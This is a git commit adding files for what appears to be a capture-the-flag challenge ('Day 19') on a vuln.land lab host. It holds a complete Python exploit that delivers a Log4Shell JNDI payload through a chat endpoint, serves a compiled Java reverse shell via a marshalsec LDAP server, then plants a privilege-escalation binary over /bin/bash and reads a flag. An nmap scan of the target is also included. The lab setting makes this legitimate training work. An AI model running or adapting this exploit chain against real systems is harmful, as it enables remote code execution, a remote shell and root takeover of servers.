Day 19 added

Day 19/.gitattributes

@@ -0,0 +1 @@
+marshalsec-0.0.3-SNAPSHOT-all.jar filter=lfs diff=lfs merge=lfs -text

Day 19/exploit.py

@@ -0,0 +1,173 @@
+#!/usr/bin/env python
+
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+
+import os
+import io
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+import signal
+import threading
+
+IP_ADDRESS = util.get_address()
+BASE_URL = "https://7e11237e-9c61-46e2-92ca-cf53299a0447.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
+PROXIES = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
+
+def request(method, uri, **kwargs):
+    if not uri.startswith("/") and uri != "":
+        uri = "/" + uri
+
+    client = requests
+    if "session" in kwargs:
+        client = kwargs["session"]
+        del kwargs["session"]
+    
+    if "allow_redirects" not in kwargs:
+        kwargs["allow_redirects"] = False
+    
+    if "verify" not in kwargs:
+        kwargs["verify"] = False
+
+    if "proxies" not in kwargs:
+        kwargs["proxies"] = PROXIES
+    
+    url = BASE_URL + uri
+    return client.request(method, url, **kwargs)
+
+def compile_java(shell_port):
+    java_code = f"""
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+
+public class Exploit {{
+
+    public Exploit() throws Exception {{
+        String host = "{IP_ADDRESS}";
+        int port = {shell_port};
+        String cmd = "/bin/sh";
+        Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
+        Socket s = new Socket(host,port);
+        InputStream pi=p.getInputStream(),
+            pe = p.getErrorStream(),
+            si = s.getInputStream();
+        OutputStream po = p.getOutputStream(), so = s.getOutputStream();
+        while (!s.isClosed()) {{
+            while (pi.available() > 0)
+                so.write(pi.read());
+            while (pe.available() > 0)
+                so.write(pe.read());
+            while (si.available() > 0)
+                po.write(si.read());
+            so.flush();
+            po.flush();
+            Thread.sleep(50);
+            try {{
+                p.exitValue();
+                break;
+            }} catch (Exception e) {{
+            }}
+        }}
+        p.destroy();
+        s.close();
+    }}
+}}
+"""
+
+    with open("Exploit.java", "w") as f:
+        f.write(java_code)
+    
+    subprocess.run(["javac", "Exploit.java"])
+    with open("Exploit.class", "rb") as f:
+        java_class = f.read()
+    
+    os.remove("Exploit.java")
+    os.remove("Exploit.class")
+    return java_class
+
+def send_message(msg):
+    json_data = { "name": "", "message": msg }
+    res = request("POST", "/up/sendmessage", json=json_data)
+    util.assert_status_code(res, 200)
+
+def get_privesc_code():
+    c_code = b"""#include <stdio.h>
+#include <unistd.h>
+int main() {
+    printf(\"Spawning a shell with -p parameter...\");
+    char *shell = \"/bin/sh\"; 
+    char *args[] = {shell, \"-p\", NULL};
+    execve(shell, args, NULL);
+    return 0; 
+}
+"""
+
+    return base64.b64encode(c_code).decode()
+
+if __name__ == "__main__":
+
+    http_Port = 8000
+    shell_port = 9001
+    java_payload = compile_java(shell_port)
+    file_server = HttpFileServer("0.0.0.0", http_Port)
+    file_server.addFile("Exploit.class", java_payload)
+    file_server.enableLogging()
+    file_server.startBackground()
+
+    payload = f"${{jndi:ldap://{IP_ADDRESS}:1389/b}}"
+    payload_url = file_server.get_full_url("#Exploit", ip_addr=IP_ADDRESS)
+    ldap_process = None
+
+    def spawn_ldap_server():
+        global ldap_process
+        ldap_process = subprocess.Popen([
+            "java",
+            "-cp",
+            os.path.join("marshalsec-0.0.3-SNAPSHOT-all.jar"),
+            "marshalsec.jndi.LDAPRefServer",
+            payload_url
+        ])
+        ldap_process.wait()
+
+    print("[ ] Starting LDAP Server")
+    ldap_thread = threading.Thread(target=spawn_ldap_server)
+    ldap_thread.start()
+
+    print("[ ] Triggering log4j shell")
+    shell = rev_shell.trigger_background_shell(lambda: send_message(payload), shell_port)
+    shell.os = "unix"
+    print("[+] Got shell!")
+
+    privesc = get_privesc_code()
+    commands = [
+        f"echo {privesc} | base64 -d > /tmp/shell.c && gcc /tmp/shell.c -o /bin/bash",
+        "/santas-workshop/tool",
+        "s",
+        "cat /home/santa/flag.txt",
+        "exit"
+    ]
+    for cmd in commands:
+        shell.sendline(cmd)
+        time.sleep(0.5)
+
+    print("[+] Flag:", shell.raw_output.decode())
+    shell.close()
+
+    print("[ ] Stopping listeners...")
+    file_server.stop()
+    ldap_process.send_signal(signal.SIGINT)
+    ldap_thread.join()

Day 19/machine

@@ -0,0 +1,51 @@
+Host: 3842c27c-9ff0-47de-b97a-9a9d5a892c87.idocker.vuln.land
+
+PORT      STATE    SERVICE    VERSION
+22/tcp    filtered ssh
+80/tcp    open     http Jetty 9.4.26v20200117
+|_http-title: Did not follow redirect to https://3842c27c-9ff0-47de-b97a-9a9d5a892c87.idocker.vuln.land:443/
+111/tcp   open     rpcbind    2-4 (RPC #100000)
+| rpcinfo: 
+|   program version    port/proto  service
+|   100000  2,3,4        111/tcp   rpcbind
+|   100000  2,3,4        111/udp   rpcbind
+|   100000  3,4          111/tcp6  rpcbind
+|_  100000  3,4          111/udp6  rpcbind
+443/tcp   open     ssl/http   Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
+| ssl-cert: Subject: commonName=*.idocker.vuln.land
+| Subject Alternative Name: DNS:*.idocker.vuln.land, DNS:idocker.vuln.land
+| Issuer: commonName=Thawte TLS RSA CA G1/organizationName=DigiCert Inc/countryName=US
+| Public Key type: rsa
+| Public Key bits: 3072
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-09-04T00:00:00
+| Not valid after:  2024-09-08T23:59:59
+| MD5:   80d7:8bfe:9544:857d:d5ab:3419:4283:4228
+|_SHA-1: 7a7c:1086:65bb:52dd:6c97:238f:a29d:c680:1b8b:5a73
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-server-header: Jetty(9.4.26.v20200117)
+|_http-title: Minecraft Dynamic Map
+| http-robots.txt: 5 disallowed entries 
+|_/tiles/ /js/ /standalone/ /images/ /css/
+8080/tcp  open     http-proxy
+| fingerprint-strings: 
+|   FourOhFourRequest, GetRequest, HTTPOptions: 
+|     HTTP/1.0 401 Unauthorized
+|     Content-Type: text/plain
+|     Www-Authenticate: Basic realm="traefik"
+|     Date: Mon, 18 Dec 2023 23:25:56 GMT
+|     Content-Length: 17
+|     Unauthorized
+|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, Socks5, TLSSessionReq, TerminalServerCookie: 
+|     HTTP/1.1 400 Bad Request
+|     Content-Type: text/plain; charset=utf-8
+|     Connection: close
+|_    Request
+|_http-title: Site doesn't have a title (text/plain).
+| http-auth: 
+| HTTP/1.1 401 Unauthorized\x0D
+|_  Basic realm=traefik
+9100/tcp  open     jetdirect?
+42810/tcp open     fmproduct  1-4 (RPC #1073741824)
+55555/tcp open     http       Golang net/http server (Go-IPFS json-rpc or InfluxDB API)

Day 19/marshalsec-0.0.3-SNAPSHOT-all.jar

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4f659fe73986787da27462f9cd2bf36603b47ceaa38b072338c369abdc2e1bd7
+size 42565306